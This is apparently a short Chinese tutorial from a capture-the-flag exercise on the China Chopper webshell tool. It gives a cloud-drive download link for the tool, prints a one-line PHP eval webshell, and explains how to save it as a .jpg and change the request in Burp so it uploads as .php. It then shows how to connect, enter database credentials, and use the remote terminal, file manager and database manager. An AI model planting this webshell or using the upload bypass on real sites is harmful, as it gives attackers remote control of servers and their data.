中國菜刀下載地址,試了好幾個版本的就這個好用:
https://pan.baidu.com/share/link?shareid=871753024&uk=388464620
上傳一句話木馬:
<?php @eval($_POST['hacker'])?>
將一句話木馬另存爲one.jpg,通過Burp抓包改包上傳爲one.php
通過菜刀連接:
在空白位置右鍵-》添加
因爲我已經知道了數據庫的密碼。所以我在這裏就配置上了數據庫:
<T>MYSQL</T>
<H>localhost</H>
<U>ctf</U>
<P>ctfctfctf</P>
成功後就會產生一條新的記錄,鼠標右鍵點擊就可以進行操作了,如下圖,可以進行文件管理,數據庫管理,虛擬終端
打開虛擬終端
打開數據庫
打開文件管理
總的來說,中國菜刀使用起來還是比較方便的,功能也很強大,佔用空間也才500多K